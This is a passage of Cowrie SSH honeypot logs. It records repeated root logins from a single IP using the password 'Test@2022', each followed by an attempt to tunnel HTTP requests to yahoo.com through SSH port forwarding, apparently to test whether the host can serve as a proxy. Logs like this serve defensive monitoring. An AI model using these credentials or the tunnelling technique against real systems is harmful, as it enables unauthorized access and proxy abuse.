0@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:47.795888Z","src_ip":"213.209.150.239","session":"68766fbd476e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:48.031330Z","src_ip":"213.209.150.239","session":"68766fbd476e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":9500,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:9500","sensor":"my-vps","timestamp":"2025-08-26T01:05:48.080320Z","session":"68766fbd476e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:48.128095Z","src_ip":"213.209.150.239","session":"68766fbd476e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":7893,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:7893","sensor":"my-vps","timestamp":"2025-08-26T01:05:48.265512Z","session":"68766fbd476e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:48.312541Z","src_ip":"213.209.150.239","session":"68766fbd476e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:48.360291Z","src_ip":"213.209.150.239","session":"68766fbd476e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38464,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5dadd1df9af","protocol":"ssh","message":"New connection: 213.209.150.239:38464 (1.2.3.4:22) [session: a5dadd1df9af]","sensor":"my-vps","timestamp":"2025-08-26T01:05:48.416097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:48.416943Z","src_ip":"213.209.150.239","session":"a5dadd1df9af"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:48.473558Z","src_ip":"213.209.150.239","session":"a5dadd1df9af"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:48.756691Z","src_ip":"213.209.150.239","session":"a5dadd1df9af"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":19161,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:19161","sensor":"my-vps","timestamp":"2025-08-26T01:05:48.814585Z","session":"a5dadd1df9af"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:48.872042Z","src_ip":"213.209.150.239","session":"a5dadd1df9af"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":7254,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:7254","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.027014Z","session":"a5dadd1df9af"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.083703Z","src_ip":"213.209.150.239","session":"a5dadd1df9af"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.140877Z","src_ip":"213.209.150.239","session":"a5dadd1df9af"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38533,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d057648cc2c","protocol":"ssh","message":"New connection: 213.209.150.239:38533 (1.2.3.4:22) [session: 4d057648cc2c]","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.196936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.198076Z","src_ip":"213.209.150.239","session":"4d057648cc2c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.254858Z","src_ip":"213.209.150.239","session":"4d057648cc2c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.538729Z","src_ip":"213.209.150.239","session":"4d057648cc2c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":2653,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:2653","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.596159Z","session":"4d057648cc2c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.653812Z","src_ip":"213.209.150.239","session":"4d057648cc2c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":8838,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:8838","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.811125Z","session":"4d057648cc2c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.868084Z","src_ip":"213.209.150.239","session":"4d057648cc2c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.926727Z","src_ip":"213.209.150.239","session":"4d057648cc2c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38590,"dst_ip":"1.2.3.4","dst_port":22,"session":"77d54ca0828d","protocol":"ssh","message":"New connection: 213.209.150.239:38590 (1.2.3.4:22) [session: 77d54ca0828d]","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.982175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:49.983175Z","src_ip":"213.209.150.239","session":"77d54ca0828d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:50.040207Z","src_ip":"213.209.150.239","session":"77d54ca0828d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:50.322389Z","src_ip":"213.209.150.239","session":"77d54ca0828d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":19954,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:19954","sensor":"my-vps","timestamp":"2025-08-26T01:05:50.379869Z","session":"77d54ca0828d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:50.436552Z","src_ip":"213.209.150.239","session":"77d54ca0828d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":17182,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:17182","sensor":"my-vps","timestamp":"2025-08-26T01:05:50.591042Z","session":"77d54ca0828d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:50.647722Z","src_ip":"213.209.150.239","session":"77d54ca0828d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:50.705148Z","src_ip":"213.209.150.239","session":"77d54ca0828d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38651,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c775ab6697b","protocol":"ssh","message":"New connection: 213.209.150.239:38651 (1.2.3.4:22) [session: 6c775ab6697b]","sensor":"my-vps","timestamp":"2025-08-26T01:05:50.751053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:50.752045Z","src_ip":"213.209.150.239","session":"6c775ab6697b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:50.799182Z","src_ip":"213.209.150.239","session":"6c775ab6697b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:51.033623Z","src_ip":"213.209.150.239","session":"6c775ab6697b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":13140,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:13140","sensor":"my-vps","timestamp":"2025-08-26T01:05:51.082287Z","session":"6c775ab6697b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:51.129406Z","src_ip":"213.209.150.239","session":"6c775ab6697b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":30925,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:30925","sensor":"my-vps","timestamp":"2025-08-26T01:05:51.265337Z","session":"6c775ab6697b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:51.312342Z","src_ip":"213.209.150.239","session":"6c775ab6697b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:51.360213Z","src_ip":"213.209.150.239","session":"6c775ab6697b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":38792,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e7874a82b68","protocol":"ssh","message":"New connection: 213.209.150.239:38792 (1.2.3.4:22) [session: 8e7874a82b68]","sensor":"my-vps","timestamp":"2025-08-26T01:05:51.416044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:51.416664Z","src_ip":"213.209.150.239","session":"8e7874a82b68"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:51.473314Z","src_ip":"213.209.150.239","session":"8e7874a82b68"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:51.756000Z","src_ip":"213.209.150.239","session":"8e7874a82b68"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":29376,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:29376","sensor":"my-vps","timestamp":"2025-08-26T01:05:51.813494Z","session":"8e7874a82b68"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:51.870269Z","src_ip":"213.209.150.239","session":"8e7874a82b68"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":26344,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26344","sensor":"my-vps","timestamp":"2025-08-26T01:05:52.026936Z","session":"8e7874a82b68"}
